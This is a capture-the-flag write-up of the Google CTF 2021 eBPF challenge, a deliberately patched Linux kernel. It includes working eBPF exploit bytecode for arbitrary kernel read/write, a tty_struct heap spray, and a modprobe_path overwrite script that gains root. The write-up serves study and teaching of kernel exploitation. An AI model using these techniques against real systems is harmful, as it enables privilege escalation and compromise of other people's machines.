Google CTF 2021 eBPF
Last weekend we played Google CTF, and I solved 2 challenges: the first 2 parts of fullchain and eBPF. The fullchain challenge is actually quite easy: the v8 bug and the mojo bug are just basic OOB access bugs. However, eBPF was quite interesting to me, since it was my first time learning about and exploiting the eBPF module in the Linux kernel, so it is worth doing a write-up for it.
0x00 Overview
In this challenge, instead of a .ko kernel module as in a normal kernel exploit challenge, we are provided only with a patched Linux kernel. The patch modifies verifier.c of eBPF so that the xor operation on a pointer to a map value is allowed. The problem is that by applying xor to such a pointer 2 times with different operand values, we can manipulate the pointer to point to an arbitrary address, which gives us arbitrary read and write primitives. We can then use this to leak a kernel address by spraying and reading tty_struct, and to rewrite modprobe_path to get root privileges.
0x01 Introduction to eBPF
There are many useful resources about eBPF online; the ones that were most useful for me in solving this challenge are this introduction to the low-level details of eBPF and this exploit of an eBPF CVE. In short, eBPF is a virtual machine that runs in the Linux kernel. A user program can provide bytecode to the kernel, and the kernel checks whether the bytecode is safe and valid before loading it; if the check passes, the kernel loads the bytecode and runs it on certain events. Note that the check is done before the bytecode runs, not while it is running. Therefore, if the check is flawed in a way that allows insecure bytecode to be loaded and run, the kernel can be compromised. This is exactly what this challenge is about.
eBPF Environment
Configuring a development environment for eBPF in C took me quite a long time, because the provided sock_example could not be compiled successfully on my computer. The CVE exploit mentioned above finally solved this problem for me, by showing how to use the eBPF API through syscall directly. In the end, the only required header file is bpf_insn.h, which can easily be downloaded from the Linux repository.
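For reference, here is a minimal sketch of what calling the eBPF API through the raw syscall looks like. The wrapper names, the socket-filter program type, and the parameters are my own assumptions for illustration; only bpf_insn.h from the kernel tree is needed for the instruction macros.
#include <stdint.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/bpf.h>
#include "bpf_insn.h"   /* instruction macros, copied from the kernel tree */

/* thin wrapper around the bpf() syscall */
static int bpf_(int cmd, union bpf_attr *attr)
{
    return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}

static int bpf_create_map(int map_type, int key_size, int value_size, int max_entries)
{
    union bpf_attr attr = {
        .map_type    = map_type,
        .key_size    = key_size,
        .value_size  = value_size,
        .max_entries = max_entries,
    };
    return bpf_(BPF_MAP_CREATE, &attr);
}

static int bpf_prog_load(const struct bpf_insn *insns, int insn_cnt, char *log, int log_size)
{
    union bpf_attr attr = {
        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, /* assumption: program attached as a socket filter */
        .insns     = (uint64_t)insns,
        .insn_cnt  = insn_cnt,
        .license   = (uint64_t)"GPL",
        .log_buf   = (uint64_t)log,
        .log_size  = log_size,
        .log_level = 1,                            /* ask the verifier for a log */
    };
    return bpf_(BPF_PROG_LOAD, &attr);
}
With these, loading a program is just bpf_prog_load(insns, sizeof(insns)/sizeof(insns[0]), log, sizeof(log)), and printing the verifier log on failure is very helpful for debugging.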
There is also another problem: we cannot compile the exploit using musl-gcc, which produces a small binary, because musl-gcc seemingly cannot find the <linux/xxx.h> header files. I solved this by preprocessing the exploit with gcc -E and compiling the preprocessed output with musl-gcc:
gcc -E exp.c -o fs/exp.c
musl-gcc -static fs/exp.c -o fs/exp
This is quite a useful trick whenever musl-gcc cannot compile an exploit that compiles fine with gcc.
0x02 Vulnerability
The first patch adds a bool auth_map field to struct bpf_reg_state, the structure used to represent the state of a register during bytecode verification. The second patch allows the BPF_XOR operation on a register of type PTR_TO_MAP_VALUE in function adjust_ptr_min_max_vals:
case BPF_XOR:
	// As long as we downgrade the result to scalar it is safe.
	if (dst_reg->type == PTR_TO_MAP_VALUE) {
		dst_reg->type = SCALAR_VALUE;
		dst_reg->auth_map = true;
		break;
	}
When BPF_XOR is then applied to a scalar register that was converted from PTR_TO_MAP_VALUE by a previous BPF_XOR operation, the register is set back to the PTR_TO_MAP_VALUE type:
// in function adjust_scalar_min_max_vals
case BPF_XOR:
	/* Restore the pointer type.*/
	if (dst_reg->auth_map) {
		dst_reg->auth_map = false;
		dst_reg->type = PTR_TO_MAP_VALUE;
		break;
	}
The problem is obvious: if we apply BPF_XOR to a PTR_TO_MAP_VALUE register, it is converted to the SCALAR_VALUE type and auth_map is set to true; when we then apply BPF_XOR to that register again, since auth_map == true, the type is set back to PTR_TO_MAP_VALUE. However, the operand values provided to the 2 BPF_XOR operations can be different, so we can actually set the register to an arbitrary address while the verifier still treats it as PTR_TO_MAP_VALUE. This eventually leads to arbitrary memory read and write primitives.
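To make this concrete, here is a minimal sketch of the primitive. It assumes BPF_REG_0 already holds a verified PTR_TO_MAP_VALUE obtained from bpf_map_lookup_elem and BPF_REG_1 holds an attacker-controlled delta; the register choices are purely illustrative.
BPF_ALU64_IMM(BPF_XOR, BPF_REG_0, 0),         // verifier: pointer -> scalar, auth_map = true
BPF_ALU64_REG(BPF_XOR, BPF_REG_0, BPF_REG_1), // verifier: scalar -> PTR_TO_MAP_VALUE again,
                                              // runtime: r0 = map_value ^ 0 ^ delta
BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_0, 0), // read through the faked map-value pointer
By choosing delta = map_value ^ target (the actual exploit computes this xor in-program, since map_value is not known in advance), the second XOR leaves the register pointing to target while the verifier still believes it points into the map.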
0x03 Exploitation
Getting a PTR_TO_MAP_VALUE Register
This actually took me quite a long time. I originally thought the value returned from BPF_LD_MAP_FD was PTR_TO_MAP_VALUE, but it is actually not. Finally, by reading the source code and looking for references to RET_PTR_TO_MAP_VALUE_OR_NULL, I found that the return type of BPF_FUNC_map_lookup_elem is RET_PTR_TO_MAP_VALUE_OR_NULL, and that by checking it against NULL we can get a register of type PTR_TO_MAP_VALUE. This is also exactly what the example provided shows.
Therefore, we can apply the BPF_XOR operation to that register, and it turns out that the verification check passes, which means the vulnerability has been triggered. We can leak the address of the BPF_MAP_TYPE_ARRAY buffer by writing the result of BPF_XOR into the buffer and reading the buffer in user space.
Leaking Kernel Address
After some investigation, I found that the BPF_MAP_TYPE_ARRAY buffer is probably stored on the heap. Therefore, the idea is to spray tty_struct, which contains a kernel address at offset +0x18, and read that field to get a kernel address. However, after some trial, I found that it is hard to allocate a tty_struct adjacent to the BPF_MAP_TYPE_ARRAY buffer; nonetheless, I also found that although tty_struct ends up quite far from the BPF_MAP_TYPE_ARRAY buffer, the offset from the buffer to a tty_struct is fairly constant: 0x21ef0. Therefore, we can simply add this constant offset to the buffer address and read the field at +0x18 to leak a kernel address. However, this is not 100% stable and needs some brute force before the assumption holds.
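The spray itself can be done from user space before loading the leak program. A minimal sketch, assuming that each open of /dev/ptmx allocates a tty_struct on the kernel heap and that 0x200 objects are enough (the count is my guess, not taken from the original exploit):
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>

#define SPRAY_COUNT 0x200   /* assumption: enough to land a tty_struct at buffer + 0x21ef0 */

static int spray_fds[SPRAY_COUNT];

static void spray_tty(void)
{
    for (int i = 0; i < SPRAY_COUNT; i++) {
        /* each open of /dev/ptmx allocates a tty_struct in the kernel heap */
        spray_fds[i] = open("/dev/ptmx", O_RDWR | O_NOCTTY);
        if (spray_fds[i] < 0) {
            perror("open /dev/ptmx");
            exit(1);
        }
    }
}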
The bytecode for leaking is shown below:
struct bpf_insn insns[]={
    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4), /* *(u32 *)(fp - 4) = r0 */
    BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), /* r2 = fp - 4 */
    BPF_LD_MAP_FD(BPF_REG_1, EXP_MAP_FD),
    BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
    BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 11+1),
    BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),
    BPF_MOV64_REG(BPF_REG_2, BPF_REG_0),
    BPF_MOV64_REG(BPF_REG_3, BPF_REG_0),
    BPF_ALU64_IMM(BPF_XOR, BPF_REG_2, 0), // convert r2, r1 to scalar
    BPF_ALU64_IMM(BPF_XOR, BPF_REG_1, 0),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 0x21ef0+0x18),
    BPF_ALU64_REG(BPF_XOR, BPF_REG_0, BPF_REG_2), // r0 = dst ^ src
    BPF_ALU64_REG(BPF_XOR, BPF_REG_1, BPF_REG_0), // r1 = src ^ dst ^ src = dst
    BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_1, 0), // r2 = [dst] = leaked kernel address
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 0x451200), // r2 = &modprobe
    BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_2, 0), // store and leak modprobe
    BPF_JMP_IMM(BPF_JMP, BPF_REG_0, 0, 1),
    BPF_MOV64_IMM(BPF_REG_0, 0), /* r0 = 0 */
    BPF_EXIT_INSN(),
};
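The program is then driven from user space. A minimal sketch, assuming the program is attached as a socket filter, the map was created with 4-byte keys and 8-byte values, and progfd/mapfd are the descriptors returned by the wrappers sketched earlier:
#include <stdint.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <linux/bpf.h>

#ifndef SO_ATTACH_BPF
#define SO_ATTACH_BPF 50
#endif

static uint64_t trigger_and_read(int progfd, int mapfd)
{
    int socks[2];
    socketpair(AF_UNIX, SOCK_DGRAM, 0, socks);
    setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd));
    write(socks[1], "A", 1);                 /* any packet makes the filter run */

    /* read back what the bytecode stored into element 0 of the map */
    uint32_t key = 0;
    uint64_t value = 0;
    union bpf_attr attr = {
        .map_fd = mapfd,
        .key    = (uint64_t)&key,
        .value  = (uint64_t)&value,
    };
    syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
    return value;
}
In this challenge, the value read back is &modprobe_path, which is then plugged into the second program shown below.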
There are also some points to note:
- We need to add a constant to the register containing the buffer address, but we cannot use that register later to load memory data directly; this is because the verifier seems to detect the out-of-bounds access if we do so. Therefore we need to use the xor magic to indirectly make a PTR_TO_MAP_VALUE register point to tty_struct.
- One weird thing is that, even if we don't use BPF_XOR, we can still somewhat leak the address of the buffer; I am not sure why this happens.
- You may ask why I only leak the kernel address in this step, instead of performing the whole exploitation and rewriting modprobe_path with the arbitrary write. The problem is that if the operand register of BPF_XOR originates from a load through a PTR_TO_MAP_VALUE register, the second BPF_XOR cannot convert the register back to the PTR_TO_MAP_VALUE type. I would guess the reason is that the patch was added to adjust_scalar_min_max_vals, which, according to its name, is used to analyze the range of a scalar; the verifier cannot decide the range of a value loaded from BPF_MAP_TYPE_ARRAY memory, so this function is possibly not called and the code that converts the scalar back to PTR_TO_MAP_VALUE is never triggered.
- It seems that sometimes, if we apply BPF_XOR to a register more than 2 times, the kernel crashes when loading the bytecode; I am not sure why this happens either.
Rewriting modprobe_path
Then we exploit the bug again to rewrite modprobe_path and read the flag. This time, instead of loading the address of modprobe_path from memory, we supply it directly as a constant, so the problem from the last step does not exist. We can then use the xor magic again to obtain a PTR_TO_MAP_VALUE register pointing to &modprobe_path, so that storing through that register rewrites modprobe_path.
The bytecode is shown below:
struct bpf_insn insns2[]={
    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4), /* *(u32 *)(fp - 4) = r0 */
    BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), /* r2 = fp - 4 */
    BPF_LD_MAP_FD(BPF_REG_1, expmapfd),
    BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
    BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 28+1),
    BPF_MOV64_REG(BPF_REG_3, BPF_REG_0),
    BPF_ALU64_IMM(BPF_XOR, BPF_REG_3, 0), // convert r0, r3 to scalar
    BPF_ALU64_IMM(BPF_XOR, BPF_REG_0, 0),
    BPF_MOV64_IMM(BPF_REG_1, 0),
    BPF_MOV64_IMM(BPF_REG_2, (modprobe >> 0x30) & 0xffff),
    BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 0x30),
    BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2),
    BPF_MOV64_IMM(BPF_REG_2, (modprobe >> 0x20) & 0xffff),
    BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 0x20),
    BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2),
    BPF_MOV64_IMM(BPF_REG_2, (modprobe >> 0x10) & 0xffff),
    BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 0x10),
    BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2),
    BPF_MOV64_IMM(BPF_REG_2, (modprobe) & 0xffff),
    BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2), // r1 = &modprobe
    BPF_ALU64_REG(BPF_XOR, BPF_REG_0, BPF_REG_1), // r0 = src ^ &modprobe, restored to PTR_TO_MAP_VALUE
    BPF_ALU64_IMM(BPF_XOR, BPF_REG_0, 0), // convert r0 back to scalar
    BPF_ALU64_REG(BPF_XOR, BPF_REG_3, BPF_REG_0), // r3 = src ^ src ^ &modprobe = &modprobe
    BPF_MOV64_IMM(BPF_REG_4, 0),
    BPF_MOV64_IMM(BPF_REG_2, (tmp_x >> 0x20) & 0xffff),
    BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 0x20),
    BPF_ALU64_REG(BPF_OR, BPF_REG_4, BPF_REG_2),
    BPF_MOV64_IMM(BPF_REG_2, (tmp_x >> 0x10) & 0xffff),
    BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 0x10),
    BPF_ALU64_REG(BPF_OR, BPF_REG_4, BPF_REG_2),
    BPF_MOV64_IMM(BPF_REG_2, (tmp_x) & 0xffff),
    BPF_ALU64_REG(BPF_OR, BPF_REG_4, BPF_REG_2), // r4 = "/tmp/x"
    BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_4, 0), // rewrite modprobe_path
    BPF_JMP_IMM(BPF_JMP, BPF_REG_0, 0, 1),
    BPF_MOV64_IMM(BPF_REG_0, 0), /* r0 = 0 */
    BPF_EXIT_INSN(),
};
There are also 2 points to note:
- We have to load the immediate number using BPF_LSH and BPF_OR, because BPF_MOV64_IMM only supports a 32-bit signed immediate.
- We cannot apply BPF_XOR directly with the PTR_TO_MAP_VALUE register as destination and the &modprobe_path register as operand, because this raises an error: the value of &modprobe_path, as a signed 64-bit integer, is too low and falls below a minimum bound. Instead, we need to convert the destination register to a scalar first before applying this operation; after the operation the register becomes PTR_TO_MAP_VALUE again, so we need to apply BPF_XOR once more to convert it back to a scalar. Fortunately, such a 3-times BPF_XOR does not cause any crash when loading the bytecode.
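After both programs have run, modprobe_path points to /tmp/x, and the last step is the usual modprobe trick: executing a file with an unknown binary format makes the kernel run modprobe_path as root. A minimal sketch, assuming the flag lives at /flag and that the shell utilities in the challenge environment behave like busybox (both are assumptions about the setup):
#include <stdlib.h>

static void get_flag(void)
{
    /* /tmp/x is executed as root when the kernel invokes its "modprobe" */
    system("echo '#!/bin/sh' > /tmp/x");
    system("echo 'cp /flag /tmp/flag && chmod 777 /tmp/flag' >> /tmp/x");
    system("chmod +x /tmp/x");

    /* a file with an invalid magic: execve() finds no binfmt handler, so the
       kernel falls back to request_module() and runs modprobe_path as root */
    system("printf '\\xff\\xff\\xff\\xff' > /tmp/dummy; chmod +x /tmp/dummy");
    system("/tmp/dummy");     /* fails, but triggers /tmp/x */
    system("cat /tmp/flag");
}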
The full exploit is here.
0x04 Conclusion
This is quite a good challenge, and I learned a lot about eBPF while solving it. I hope eBPF can also serve as a good attack surface for real-world Linux kernel vulnerability research.